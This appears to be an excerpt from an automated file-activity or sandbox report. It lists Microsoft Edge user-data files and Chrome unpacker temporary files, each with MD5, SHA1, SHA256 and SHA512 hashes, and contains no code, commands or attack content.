SHA256 0404a38573cdcc351d9ba19089cdfe690b824df42f86122d47dcee92992b1a4e
SHA512 5659c6d1bae4f46e440d10f6e13dd6004aed6461befad1ab27791e44105a3dfae40d08259605cff6a05b89cb0dda4cd80fee681944c5ea82c5a603d7b66779b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 c16c998f4bbdddd1b8d7acafe29c3214
SHA1 4f203a019ee0681240820be3348bdd982d11c29c
SHA256 f4acda152b86656485bf0acfb5d8fd97332ca218154f575507019c3f27889112
SHA512 3b3febf39ecca70eb692e71791bea1a46a094b5173033ee6d6ad158c8fde24e32474b7b304c3cf02d93d098cfcf5410eebfedd333032ba3b710739a3b8f63ed6

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_1151534913\manifest.json

MD5 e0909520982fc48e47a6451443b11741
SHA1 0e46425274933c153ebf5a03f25e693267a8cea2
SHA256 2e9e6138305d702f3c9b89d6e9dc4931b548c69bb86db64e585fa2e37b8ef654
SHA512 3fdf504cb0bf39a807fa15a8ec31a6efd8083888692935ec31d70b4ef6eef89b8527c6a75a46bf7ae3efeeaa507ac3c7cccda5246a2f073ac603a7ffa10d20a8

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_1151534913\LICENSE

MD5 ee002cb9e51bb8dfa89640a406a1090a
SHA1 49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA256 3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512 d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_559609418\manifest.json

MD5 8177721150435a9b333475e2b8a6e691
SHA1 8aa8981617e8f3d8967a0a4a2d20315317eba293
SHA256 8a4800ed5f63b9371a024c501ee2b031af94539e32e6753214e6d99c625c018c
SHA512 540c4c52030c6a4e1efcfab5eb59760c696bb3e3f1b8f93c97a6368639a911ba3d395190fc0798d99f3c63e25b6dcf2ded482bbda34d36ddd874dd20c2cfdf74

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\edge_autofill_global_block_list.json

MD5 adb5f6058f82680a26d6ed02b44e5a21
SHA1 6197ee74e40c742e184357dcb6dfcc7e32818cae
SHA256 7655c9afb5f2ea39b18e302498b34009ca02b72451f82a6d4e7fb4d8d954f050
SHA512 742dd8f6eaf1bd5f24b37e90d7a3dce7bd0a8edf399c2dec25cd92d2bd6e1d663ebab3c68234812f0144061d4f22f0c2c43de890f60e24d93133bbfe23a6d1c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\autofill_bypass_cache_forms.json

MD5 9357a694006d8bec3d0f8c9607b76ff8
SHA1 6335ce691999ec10de742cd07d074eb648631259
SHA256 b6c37df977f149c5a444c72ea4469ce666c7975d34c6e2e0d9d8ec416f57dd44
SHA512 87c2d0192f3a78b13a691cda14da507f260d13331b792eb973869bd6dbd0f207faa48f68882be691641b46c06ed12ee8b9728a3b596df67a1f9a4831b4369a44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\v1FieldTypes.json

MD5 c1a0d30e5eebef19db1b7e68fc79d2be
SHA1 de4ccb9e7ea5850363d0e7124c01da766425039c
SHA256 f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1
SHA512 f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5292_1772330788\manifest.json

MD5 390af74c5ae643320cad0cef4fa8fee1
SHA1 22ce727f9bcff9a914eb1d58ba8384de6fbda7e1
SHA256 1148c28e540b9b96237b35170a547a13165d6c7c039b8fff9e4b2cd774b92f5a
SHA512 deaeeeffdddea1a9047e97d82e3bb701fb865adcd77ef9e985bb0ec5e4057155e7b83cad4f9f3dd256edf89f19d1075349cea5005dffff8420da4d0646be413a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 601cfc3d7104c6b0cae6658f98404383
SHA1 584fbd6f690483101daa0abbb64bc50b607fee75
SHA256 cc545cce17eaaddc438c9d415b453c52a2094d572c5544378778a1da9e4123dd
SHA512 ed5871a55bbec95c756ceec85f264de01d6149e614aae2ce4e3313c835a446be6b216d51c9860216fa99813f3e54b9f83e198911837626ea6260ba510c9d5a2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 147f513861d7e6b41a45891b5b30be87
SHA1 102b03bd3f45fb552e1ebc303306e72c0771d769
SHA256 f729c0824133c0a6260494772344a3b79cac90b70b02f8b87749118a39d9129f
SHA512 26d3c674cfc50e85cf59f81ab5ae924c55edcfd136df87912bb9afb7f975bd15d51c34a4c6632c859d8c66141821d049386ee820e804c83c8f3febf670f15ba5